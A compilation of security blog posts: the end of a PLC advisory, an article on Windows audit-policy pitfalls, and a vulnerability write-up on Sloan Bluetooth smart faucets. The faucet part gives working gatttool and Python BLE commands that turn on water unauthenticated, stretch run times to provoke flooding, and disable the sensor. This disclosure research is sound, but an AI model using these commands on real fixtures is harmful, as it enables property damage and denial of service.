While vendors are expected to patch within 90 days of disclosure, the ICS industry as a whole hasn’t evolved to the point of security maturity needed to meet these expectations. Given the sensitive industries where these PLCs are deployed, one would imagine that we would have come a long way by now in elevating the security posture. Prioritizing and funding a holistic Security Development Lifecycle (SDL) is key to reducing cyber exposure and raising the bar for attackers. However, many of these systems are just sitting there unguarded, in some cases without anyone aware of the potential danger.

See https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-01 for Schneider Electric’s advisory.

See https://us-cert.cisa.gov/ics/advisories/icsa-21-194-02 for ICS-CERT’s advisory.


Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit…

6 July 2021 at 21:54

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit policy

Tenable.ad can detect Active Directory attacks. To do this, the solution needs to collect security events from the monitored Domain Controllers to be analyzed and correlated. Fortunately, Windows offers built-in audit policy settings to configure which events should be logged. But when testing those options, we noticed surprising behaviors that can lead to missed events.

When you configure your Active Directory domain controllers to log security events to send to your SIEM and raise alerts, you absolutely do not want any regression which would ultimately blind your SOC! In this article we will share technical tips to prevent those unexpected issues.

Disclaimer

This content is based on observations and our interpretation of Microsoft documentation. This article is provided “as-is” and we do not provide any guarantee of correctness or exhaustiveness; you should only rely on Microsoft guidance.

Introduction

Starting with Windows 2000, Windows offered only simple audit policy settings grouped in nine categories. Those are referred to as “top-level categories” or “basic audit policy” and they are still available in modern versions.

Later, “granular auditing” was introduced with Windows Vista / 2008 (it was configurable only via “auditpol.exe”) and then Windows 7 / 2008 R2 (configurable via GPO). Those are referred to as “sub-level categories” or “advanced audit policy”.

Each basic setting corresponds to a mix of several advanced settings. For example, from Microsoft Advanced security auditing FAQ:

Enabling the single basic account logon setting would be the equivalent of setting all four advanced account logon settings.

The content described in this article was tested on Windows Active Directory domain controllers because those are the most appropriate sources of interest for Active Directory attacks detection, but it should apply to all kinds of Windows machines (servers & workstations).

Surprise #1 — Advanced audit policy fully replaces the basic policy

As soon as we enable even just one advanced audit policy setting, Windows fully switches to advanced policy mode and ignores all existing basic policies (at least on the recent versions of Windows we tested)! Here is a demonstration:

  • Before: the system uses basic settings. We enable “Success, Failure” for “Audit privilege use” (green highlighting) and for other categories the default values apply. This works as expected:
  • After: we only enable one advanced setting (green highlighting). Notice how everything else is not audited anymore, including what we explicitly configured in the basic policy (red highlighting)!

Therefore, you cannot have both: once you start using the advanced audit policy (which you should), you are committed to it and should abandon the basic settings to prevent confusion.

Microsoft Advanced security auditing FAQ explains it:

When advanced audit policy settings are applied by using Group Policy, the current computer’s audit policy settings are cleared before the resulting advanced audit policy settings are applied. After you apply advanced audit policy settings by using Group Policy, you can only reliably set system audit policy for the computer by using the advanced audit policy settings. […] Important: Whether you apply advanced audit policies by using Group Policy or by using logon scripts, do not use both the basic audit policy settings under Local Policies\Audit Policy and the advanced settings under Security Settings\Advanced Audit Policy Configuration. Using both advanced and basic audit policy settings can cause unexpected results in audit reporting.

➡️ Tenable.ad recommendation: use advanced audit policy settings only. Existing basic audit policies should be converted.
This recommendation is present in the best practices and hardening guides published by cybersecurity organizations (such as ANSSI, DISA STIG, CIS Benchmarks…).

Surprise #2 — Advanced audit policy may be ignored

However, there are some cases where basic audit policy settings may still take priority over the ones defined in the advanced audit policy. Correctly understanding when and where it could happen is complicated.

As per Microsoft Advanced security auditing FAQ:

If you use Advanced Audit Policy Configuration settings or use logon scripts to apply advanced audit policies, be sure to enable the “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” policy setting under “Local Policies\Security Options”. This will prevent conflicts between similar settings by forcing basic security auditing to be ignored.

➡️ Tenable.ad recommendation: once you start using advanced audit policy, we recommend enabling the “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” GPO setting to prevent undesired surprises. Its default value being “Enabled”, it should already be effective anyway in the majority of environments.
This recommendation is present in the best practices and hardening guides published by cybersecurity organizations (such as ANSSI, DISA STIG, CIS Benchmarks…).

Surprise #3 — Advanced audit policy default values are not respected

As we saw previously, as soon as we enable even just one advanced audit policy setting, the system entirely switches to the advanced mode. The question now is: how does the system manage the other settings that we did not specify? There are certainly sensible default values, aren’t there? These default values are described in the documentation of each audit policy setting. Let’s read the explanation of the “Audit Logon” setting:

So, here on a server I should expect a default value of “Success, Failure” for the “Audit Logon” setting if not configured, shouldn’t I? Well, we may have a surprise here.

Here is the configuration I applied on my server: I enabled “Success” logging for “Audit Account Lockout” and left “Audit Logon” as “Not Configured”:

However, when looking at the resulting audit policy I notice that “Logon” events are not audited, contrary to their default:

We knew we should not rely on defaults… but this one is really surprising. Of course we made sure that there was no other GPO defining any audit policy setting.

➡️ Tenable.ad recommendation: do not rely on default values for Advanced audit policy settings: explicitly configure the desired value (No Auditing, Success, Failure, or Success and Failure) for each setting of interest.

Be even more careful when migrating from a basic audit policy: make sure to export the resulting policy you had on a normal machine, and convert it to all the appropriate advanced settings to prevent any regression in logging. And as usual with GPOs, especially for security settings, aim for a single security GPO linked as high as possible, instead of spreading the settings across many lower-level GPOs.

Surprise #4 — Settings defined by GPOs are not merged

What happens when a machine is covered by several GPOs which define audit policy settings? What if one GPO enables “Success” auditing while another enables “Failure” auditing: is there a merge, and would we obtain “Success and Failure”?

Answer: there is no merge at the setting level, and only the value of the GPO with the highest priority is applied. This is actually coherent with the way the Group Policy engine usually works, so not really a surprise, but still to keep in mind.

Here is a demonstration where we want to configure auditing on domain controllers. Two GPOs apply to those servers:

“Default Domain Policy”, linked at the top of the Active Directory domain:

  • “Audit Account Lockout” is set to “Success and Failure” (yellow highlighting)
  • “Audit Logon” is set to “Success” (red highlighting)

“Default Domain Controllers Policy”, linked to the “Domain Controllers” organizational unit:

  • “Audit Logoff” is set to “Success and Failure” (blue highlighting)
  • “Audit Logon” is set to “Failure” (red highlighting)

Now let’s see the resulting audit policy:

We notice that the conflicting values for “Logon” (red highlighting) were not merged; instead, the value from the “Default Domain Controllers Policy” applied. This GPO won as per the usual GPO precedence rules.

We also observe that the values for “Logoff” (blue highlighting) from the “Default Domain Controllers Policy” and “Account Lockout” (yellow highlighting) from the “Default Domain Policy” are both properly applied because those were not in conflict.

Here is how Microsoft Advanced security auditing FAQ explains it:

By default, policy options that are set in GPOs and linked to higher levels of Active Directory sites, domains, and OUs are inherited by all OUs at lower levels. However, an inherited policy can be overridden by a GPO that is linked at a lower level.

You can also read more about GPO Processing Order in the [MS-GPOL] specification.

➡️ Tenable.ad recommendation: keep in mind that conflicting audit settings are not merged.
If you want to define a domain-wide security auditing GPO, you should ensure that no other GPO at a lower OU level overrides its settings. If necessary, you can set this domain-wide GPO as “Enforced”, even if this is not our preferred option as it can become confusing when managing a large set of GPOs.

If you are only concerned about auditing on domain controllers, you can link a GPO to the “Domain Controllers” organizational unit, as long as there is no domain-level “Enforced” GPO overriding audit policy settings.

Surprise #5 — Only one tool properly shows the effective audit policy

We have just shown that we can have many surprises when configuring auditing, so we really would like a way to see the effective audit policy on a system to confirm that it is as expected.

We could be tempted to use tools which compute the result of GPOs (RSoP), but…

For example, “rsop.msc” does not even seem to support advanced audit policy, which is not too surprising since it is deprecated! See how this section is used in the GPO editor on the right-hand side whereas it is missing in “rsop.msc” on the left-hand side:

And with “gpresult.exe”, if we have basic and advanced audit policies, we will see both: which one applies?

And what about settings that might have been configured locally and not through a GPO (which is not advised…)?

The only supported tool which can properly read the current effective audit policy is “auditpol.exe”, as you may have guessed from our previous screenshots. This is confirmed by a Microsoft blog post. For those who want to dig deeper: “auditpol.exe” calls AuditQuerySystemPolicy, which finally calls the “LsarQueryAuditPolicy” RPC in LSASS.

➡️ Tenable.ad recommendation: only trust the following command to see the effective audit policy on machines: “auditpol.exe /get /category:*”

Surprise bonus — Confusions in the specification

Configuring advanced audit policy in a GPO creates an “audit.csv” file which is described in the [MS-GPAC] Microsoft open specification. We found a mistake in one of the examples:

Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,Exclusion Setting,Setting Value
TEST-MACHINE,System,IPsec Driver,{0CCE9213-69AE-11D9-BED3-505054503030},No Auditing,,0
TEST-MACHINE,System,System Integrity,{0CCE9212-69AE-11D9-BED3-505054503030},Success,,1
TEST-MACHINE,System,IPsec Extended Mode,{0CCE921A-69AE-11D9-BED3-505054503030},Success and Failure,,3
TEST-MACHINE,System,File System,{0CCE921D-69AE-11D9-BED3-505054503030},Not specified,,0

On the right-hand columns we have the setting name (such as “No Auditing”, “Success”, etc.) and the corresponding numerical value (0, 1, 3…). We can see that, according to the first and last lines, the value “0” is associated with both “No Auditing” and “Not specified”, which does not make sense. Fortunately the text value is ignored: “value of InclusionSetting is for user readability only and is ignored when the advanced audit policy is applied”.

Also, we found the specification a bit confusing regarding the values of “0” and “4”:

A value of “0”: Indicates that this audit subcategory setting is unchanged.
A value of “4”: Indicates that this audit subcategory setting is set to None.

Our observations actually show that:

  • A value of “0” means that auditing is “disabled”, which corresponds to this in the graphical editor:
  • A value of “4” means that auditing is “not specified”, and thus the default value should apply (except when it does not, as shown before), which would correspond to this in the graphical editor (except that in this case the editor does not even generate a line for this setting in “audit.csv”):

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit… was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Plumbing the Depths of Sloan’s Smart Bathroom Fixture Vulnerabilities

By: Ben Smith
30 June 2021 at 13:03

As I stood in line at my local donut shop, I idly began scanning nearby Bluetooth Low Energy (BLE) devices. There were several high-rises nearby, and who knows what interesting things lurk in those halls. Typically, I’ll see consumer technology like Apple products, fitness trackers, entertainment systems, but that day I saw something that piqued my interest… Device Name: FAUCET ADSKU01 A0174. A bluetooth… faucet?! I had to know more. Since I clearly did not own this particular device and also didn’t want to risk a flood, I went home and looked up all I could find about these SmartFaucets while greedily gobbling a glazed donut or two.

Device Name: FAUCET

The device belonged to a line of SmartFaucets and Flushometers made by Sloan Valve Company, and I had to find one I could use for testing. Their connected devices include Sloan SmartFaucets such as the Optima EAF, Optima ETF/EBF, and BASYS EFX (these require an external adapter), and Flushometers such as the SOLIS, and can be viewed over at https://www.sloan.com/design/connected-products. The app to connect to these devices is called SmartConnect and is available in the Google Play or Apple App stores.

An update to Sloan’s feature checklist

A Quick Bluetooth Glossary

Bluetooth Classic — This is the original Bluetooth protocol still widely used. Sometimes it will be referred to as “BR” or “EDR.” Devices are connected one to one.

Bluetooth Low Energy (BLE) — This is actually a different protocol from Bluetooth Classic. It has lower energy requirements, and devices can interoperate one-to-one, one-to-many, or even many-to-many. Almost everywhere we mention Bluetooth in this article, we mean BLE, and not Bluetooth Classic.

Services — Technically part of the “GATT” BLE layer, services are groupings of characteristics by function.

Characteristics — Part of the “GATT” BLE layer, characteristics are UUID/value pairs on a device. The value can be read, written to, and more, depending on permissions. Sometimes it’s helpful to think of them as UDP ports with (generally) very simple services.

UUIDs — Random numbers used to refer to services and characteristics. Some are assigned by the Bluetooth SIG, while others are set by the device’s manufacturer.

Sloan SmartConnect App

SmartConnect App has a button to “Dispense Water”

As its sole protection mechanism, the app requires a phone number prior to use and then sends a code to that number.

More SmartConnect app functionality

After that, quite an array of features are available. Let’s see what we can find out with an actual device.

SmartFaucet

Sloan EBF615–4 Internals

I managed to acquire a Sloan EBF615–4 Optima Plus, added batteries, and plugged in the faucet. When I wave my hand in front of the IR sensor, I can hear the clicking of the faucet mechanism allowing a potential flow of water to course through the spigot. This is good as I’ll have some way of knowing if we’re getting somewhere. I’d already installed the SloanConnect app, and registered with an actual phone number, so I was able to connect to the device.

Let’s start by using hcitool to scan for BLE devices nearby. Hcitool is a Linux utility for scanning for Bluetooth devices and interacting with our Bluetooth adapter. The ‘lescan’ option allows us to scan for Bluetooth Low Energy. The device we’re interested in is aptly named “FAUCET”.

pi@rpi4:~ $ sudo hcitool lescan | grep FAUCET
08:6B:D7:20:00:01 FAUCET ADSKU02 A0121
08:6B:D7:20:00:01 FAUCET ADSKU02 A0121

Now that we know its MAC address, we can use gatttool, a Linux utility for interacting with BLE devices, to query the BLE services:

pi@rpi4:~ $ sudo gatttool -b 08:6B:D7:20:00:01 --primary
attr handle = 0x0001, end grp handle = 0x0005 uuid: 00001800-0000-1000-8000-00805f9b34fb
attr handle = 0x0006, end grp handle = 0x0009 uuid: 00001801-0000-1000-8000-00805f9b34fb
attr handle = 0x000a, end grp handle = 0x000e uuid: 0000180a-0000-1000-8000-00805f9b34fb
attr handle = 0x000f, end grp handle = 0x002d uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c900
attr handle = 0x002e, end grp handle = 0x0031 uuid: 0000180f-0000-1000-8000-00805f9b34fb
attr handle = 0x0032, end grp handle = 0x0050 uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c910
attr handle = 0x0051, end grp handle = 0x0081 uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c920
attr handle = 0x0082, end grp handle = 0x009d uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c940
attr handle = 0x009e, end grp handle = 0x00a1 uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c950
attr handle = 0x00a2, end grp handle = 0x00ba uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c960
attr handle = 0x00bb, end grp handle = 0x00d9 uuid: d0aba888-fb10-4dc9-9b17-bdd8f490c970
attr handle = 0x00da, end grp handle = 0xffff uuid: 1d14d6ee-fd63-4fa1-bfa4-8f47b42119f0

and their characteristics:

pi@rpi4:~ $ sudo gatttool -b 08:6B:D7:20:00:01 --characteristics
handle = 0x0002, char properties = 0x0a, char value handle = 0x0003, uuid = 00002a00-0000-1000-8000-00805f9b34fb
handle = 0x0004, char properties = 0x02, char value handle = 0x0005, uuid = 00002a01-0000-1000-8000-00805f9b34fb
handle = 0x00db, char properties = 0x08, char value handle = 0x00dc, uuid = f7bf3564-fb6d-4e53-88a4-5e37e0326063
handle = 0x00de, char properties = 0x04, char value handle = 0x00df, uuid = 984227f3-34fc-4045-a5d0-2c581f81a153

Once we reverse the Android app, we can hopefully find variable names that reference these UUIDs and determine their function.

One thing I’ve noticed while doing this is that the device seems to stop beaconing every so often, and I need to either press a button on it OR wait a bit OR unseat and reseat the batteries. It’s possible that it limits connections over a period of time.

Let’s take a look back at the app.

SmartConnect Again

After pulling the app off of my phone using adb and then reversing it with jadx, I start searching for interesting bits. The first one to jump out was:

public final void dispenseWater() {
    if (getMainViewModel().getConnectionState().getValue() == ConnectionState.CONNECTED) {
        getMainViewModel().getConnectionState().setValue(ConnectionState.DISPENSING_WATER);
        BluetoothGattCharacteristic bluetoothGattCharacteristic = getMainViewModel().getGattCharacteristics().get(UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE));
        if (bluetoothGattCharacteristic != null) {
            bluetoothGattCharacteristic.setValue("1");
        }
        FragmentActivity activity = getActivity();
        if (activity != null) {
            BluetoothLeService bluetoothLeService = ((MainActivity) activity).getBluetoothLeService();
            if (bluetoothLeService != null) {
                bluetoothLeService.writeCharacteristic(bluetoothGattCharacteristic);
                return;
            }
            return;
        }
        throw new TypeCastException("null cannot be cast to non-null type com.smartwave.sloanconnect.MainActivity");
    }
}

Seems like it’ll be pretty easy to make this thing flow. Now we just need to figure out the BLE characteristic UUID referenced by UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE. This is made incredibly easy thanks to a nice table of UUID variables.

public static final String UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE = "d0aba888-fb10-4dc9-9b17-bdd8f490c954";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92a";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLUSH_ON_OFF = "d0aba888-fb10-4dc9-9b17-bdd8f490c946";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c942";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_STATISTICS_INFO_NUMBER_OF_ALL_FLUSHES = "d0aba888-fb10-4dc9-9b17-bdd8f490c916";
public static final String UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE = "f89f13e7-83f8-4b7c-9e8b-364576d88334";
public static final String UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = "f89f13e7-83f8-4b7c-9e8b-364576d88361";

Wow. In addition to finding our water dispensing UUID, there are a lot of other interesting variable names. A select few of ~100 are shown above. It looks like this thing supports over-the-air (OTA) firmware updates, tons of diagnostic and sensor settings, possible security settings, and more.

Now that we know the UUID that turns on the water, let’s use nRF Connect to see what we can do. I’m switching over to nRF Connect from gatttool because it handles the connection more easily. Since the faucet seems to ‘time out’ or disallow connections after a period of time, this is useful so we don’t lose our connection and have to reset everything.

The faucet’s BLE advertising information
nRF Connect for Desktop showing the faucet’s Services

In the decompiled ‘dispenseWater()’ function above, we saw that the function basically sends a ‘1’ to the UUID stored in the variable UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE. Luckily we can find the UUID in the table we found:

public static final String UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE = "d0aba888-fb10-4dc9-9b17-bdd8f490c965";

Cool. Let’s write to that UUID. The default value is 0x30, ASCII ‘0’. Let’s write 0x31, ASCII ‘1’, since that’s what the code does. I tried writing other numbers first but nothing else did anything, until…

nRF Connect view showing flow being enabled.

I barely refrained from yelping for joy when I heard the faucet’s telltale ‘click’ indicating the spigot had activated. Since the faucet isn’t hooked up to a water source (hey, i’m not a plumber), you’ll have to bear with the above anti-climactic demo.

We should be able to do this with gatttool via:

$ sudo gatttool -b 08:6B:D7:20:00:01 --char-write-req -a 0x00b3 -n 31
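
If you would rather script it than click through nRF Connect, here is a hedged sketch using the bleak BLE library (the library choice is mine, not the blog’s; the MAC and UUID are the ones found above):

# Send ASCII '1' to the water-dispense characteristic
import asyncio
from bleak import BleakClient

FAUCET_MAC = "08:6B:D7:20:00:01"
DISPENSE_UUID = "d0aba888-fb10-4dc9-9b17-bdd8f490c965"

async def dispense():
    async with BleakClient(FAUCET_MAC) as client:
        # 0x31 ('1') triggers the same telltale click heard earlier
        await client.write_gatt_char(DISPENSE_UUID, b"1", response=True)

asyncio.run(dispense())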

Flush Toilet

Although I don’t have a smart Flushometer, it works very similarly to the faucet. We can see the code for “flushToilet()” is almost identical:

public static final void flushToilet(BluetoothLeService bluetoothLeService, MainViewModel mainViewModel) {
    Intrinsics.checkParameterIsNotNull(bluetoothLeService, "$this$flushToilet");
    Intrinsics.checkParameterIsNotNull(mainViewModel, "mainViewModel");
    if (mainViewModel.getConnectionState().getValue() != ConnectionState.FLUSHING_TOILET) {
        mainViewModel.getConnectionState().setValue(ConnectionState.FLUSHING_TOILET);
        BluetoothGattCharacteristic bluetoothGattCharacteristic = mainViewModel.getGattCharacteristics().get(UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE));
        if (bluetoothGattCharacteristic != null) {
            bluetoothGattCharacteristic.setValue("1");
        }
        bluetoothLeService.writeCharacteristic(bluetoothGattCharacteristic);
    }
}

And we can look up the UUID for the flush variable:

public static final String UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = "f89f13e7-83f8-4b7c-9e8b-364576d88361";

Even though I don’t intend to acquire a smart Flushometer, I can confidently say I know what’s happening here.

Unlock Key

There seems to be a concept of an unlock key in the android app.

public final void setGattCharacteristics(List<? extends BluetoothGattService> list) {
    DeviceData value;
    if (list != null) {
        for (T t : list) {
            Timber.i("Service: " + t.getUuid(), new Object[0]);
            List<BluetoothGattCharacteristic> characteristics = t.getCharacteristics();
            Intrinsics.checkExpressionValueIsNotNull(characteristics, "service.characteristics");
            for (T t2 : characteristics) {
                Map<UUID, BluetoothGattCharacteristic> map = this.gattCharacteristics;
                Intrinsics.checkExpressionValueIsNotNull(t2, "characteristic");
                UUID uuid = t2.getUuid();
                Intrinsics.checkExpressionValueIsNotNull(uuid, "characteristic.uuid");
                map.put(uuid, t2);
                if (Intrinsics.areEqual(t2.getUuid(), UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY)) && (value = this.activeDeviceData.getValue()) != null) {
                    value.setHasSecurity(true);
                }
            }
        }
    }
}

The setGattCharacteristics function is called on connection to build the list of services and characteristics. Here, if there’s an unlock key set, the app marks a ‘security’ value as true. Later on this value is checked when a few functions are called, but so far it looks like it just appends some notes if it is set. In a few scenarios, a beginSecurityProtocol() function is called, and it will read a ‘note’ from the device if security is enabled. This ‘note’ can be used to store the phone number of the last person to change the setting. The security function seems to be more of a way to keep some data about what happened than any sort of actual security.

Flow Rate

The app has two different sets of code to protect the flow rate from being set too high, depending on whether we’re using liters or gallons.

if (doubleOrNull != null) {
    d = doubleOrNull.doubleValue();
}
if ((valueOf.length() == 0) || d < 1.3d) {
    d = 1.3d;
} else if (d > 9.9d) {
    d = 9.9d;
}
// or, when the units are gallons:
if ((valueOf.length() == 0) || d < 0.3d) {
    d = 0.3d;
} else if (d > 2.6d) {
    d = 2.6d;
}

Since this limit is implemented in the app, I’ll bet the faucet accepts a much wider range. Of course, actual flow is limited by whatever the supply line can deliver (I’m not a plumber). The flow rate setting lives in the d0aba888-fb10-4dc9-9b17-bdd8f490c949 characteristic.

Flow Rate Value

It seems floats are written to the characteristic as two characters, in this case, 1 and 9 (1.9), which is one of the liters per minute (LPM) options. Let’s see what we can set it to.

So, we can’t set it to a 3-byte value, but we can set it to 0x3939 (9.9), which seems to be the highest value to have any effect. Of note, we can also set it to even higher values like 0xFF39, and while that doesn’t seem to do anything, it still feels like a value that shouldn’t be allowed by logic on the device. Since I don’t have the faucet hooked up to water, I can’t test what happens when we set the flow rate really high (again, not a plumber). When it’s set to 0xFF39, the app tries to display it as 0.0, and we can set it to 9.9 via the app. So, unless we plug this thing into a water line, we’re not gonna know what happens with the 0xFF39.

Activation Mode

“Activation Mode” controls how long water flows for when the IR sensor is triggered. We can set it up to 120 seconds via the app. We’re all washing our hands a lot longer during COVID, but I know I can sing happy birthday to myself two or three times and still be under that 2 minute mark. Can we set it higher and cause the faucet to flow for a really long time?

There are two types of Activation Mode: Metered and On Demand. What’s the difference between them? Surely the internet will tell me.

A Google Play Store comment indicating confusion on Metered and On Demand flow rate

Nope, no luck there. There are a few variable definitions that may give us a clue. Could that On Demand value be a mistake, off by an order of magnitude?

public final class ActivationModeFragmentKt {
    private static final int METERED_MAX_VALUE = 120;
    public static final int METERED_MODE = 1;
    private static final int MIN_VALUE = 3;
    private static final int ON_DEMAND_MAX_VALUE = 1200;
    public static final int ON_DEMAND_MODE = 0;
}

Unfortunately, those safeguards don’t seem to be enforced anywhere else. Let’s see if we can find the code that controls this. Two different characteristics control the run times for the different modes.

public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME = "d0aba888-fb10-4dc9-9b17-bdd8f490c945";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME = "d0aba888-fb10-4dc9-9b17-bdd8f490c944";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION = "d0aba888-fb10-4dc9-9b17-bdd8f490c943";
Flow Rate characteristics and values

And we can see how these are set on the device. I’m going to go ahead and assume that everything on this device is written as ASCII. So, Mode is set to 0x30 == "0", which we can see is ON_DEMAND_MODE. Metered Run Time is set to 120 seconds, and On Demand is set to 30 seconds. Cool. Let’s see how high we can go. This is going to be painful, waiting many minutes for this thing to turn back off.
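As a minimal bluepy sketch of those writes (values sent as ASCII strings, per the assumption above; the MAC address is a placeholder):

from bluepy.btle import Peripheral, UUID

MODE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c943")
METERED = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c944")
ON_DEMAND = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c945")

p = Peripheral("aa:bb:cc:dd:ee:ff")  # placeholder faucet address
p.getCharacteristics(uuid=MODE)[0].write(b"0", withResponse=True)       # 0 = ON_DEMAND_MODE
p.getCharacteristics(uuid=METERED)[0].write(b"120", withResponse=True)  # 120 seconds
p.getCharacteristics(uuid=ON_DEMAND)[0].write(b"30", withResponse=True) # 30 seconds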

The On Demand characteristic set to 1130 seconds

Ok, we’ve set the On Demand time to 1130 seconds, so, about 18 minutes. I wave my hand in front of the faucet’s IR sensor, and grab a cup of coffee. This is gonna take a while…. That didn’t work. It shut off quickly. There must be some internal idea of how long is too long. I’ll flip the mode to metered and set that pretty high. Seems metered won’t take more than 3 bytes, so I’ll set the first one to 9 for 920 seconds, or ~15 minutes. And then I’ll wait.

Metered Mode set to 920 seconds

It’s still going. There’s gotta be a better way to test. Currently, I wave my hand in front of the sensor once to engage the faucet, and then try again periodically over the timer duration. It won’t make the click of engagement until the time is up. So, the next time I can wave my hand in front of the sensor and hear a click, I know the faucet’s timer has ended. This won’t be incredibly accurate or scientific. I set a 14-minute timer and walked away. Annnnd somehow I walked right back in at the 15-minute mark and heard it click off. So, the highest value we can likely set for Metered mode is 999 seconds, which is 16.65 minutes. That’s a long time to leave the tap on. I wonder who would want to do something like that…

Wet Bandits — Be on the lookout — These criminals are armed and clumsy

DoS

In addition to causing a flood, we can trigger the opposite effect. It’s possible to disable the faucet’s sensor completely by setting the Sensor Range to 0: we simply write an ASCII "0" (0x30) to UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE. Now the faucet won’t turn on no matter how close our hand gets or how vigorously we wave.
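A minimal bluepy sketch of that single write (the MAC address is a placeholder):

from bluepy.btle import Peripheral, UUID

SENSOR_RANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c942")

p = Peripheral("aa:bb:cc:dd:ee:ff")  # placeholder faucet address
p.getCharacteristics(uuid=SENSOR_RANGE)[0].write(b"0", withResponse=True)  # range 0 = sensor disabled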

Model and Version

It’s also possible to read the model and version number via these characteristics. Nothing super exciting here, but it could be useful if we were trying to find a specific version. Most BLE-enabled devices expose these via the standard “Device Information” service; these characteristics are separate from that service, so Sloan must have had a reason to add them.

Firmware & Hardware
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION = "d0aba888-fb10-4dc9-9b17-bdd8f490c906";
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION = "d0aba888-fb10-4dc9-9b17-bdd8f490c905";

Firmware: 0109

Hardware: 0175

Logged Phone Numbers

The “security” mode of the faucet logs the phone number stored in the app for certain events.

public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c932";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c930";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92e";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92f";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = "d0aba888-fb10-4dc9-9b17-bdd8f490c929";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92b";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92a";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92c";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92d";
Phone numbers stored on faucet

I’ve conveniently set these to the Tenable support number 855-267-7044. In a real setup, each of these would hold the phone number registered in the app instance that performed that specific change. I attempted to see how wide the field was, and got up to 15 characters before it wouldn’t take any more.

It doesn’t seem like the app is parsing anything in the text fields, so no XSS that I can find.

The other interesting thing here is that any time someone makes a change to the faucet, the app causes their phone number to be stored on the faucet. This is then reflected back to any app that connects, or to anyone that reads the characteristic. This isn’t mentioned in the app, and I don’t see a privacy policy. Does GDPR apply to bathroom fixtures?

Aquis Dongle

What is Aquis? I don’t know. But there are several characteristics in the app for an Aquis Dongle. Could this be a new product line? A partnership with another company that this app will work with?

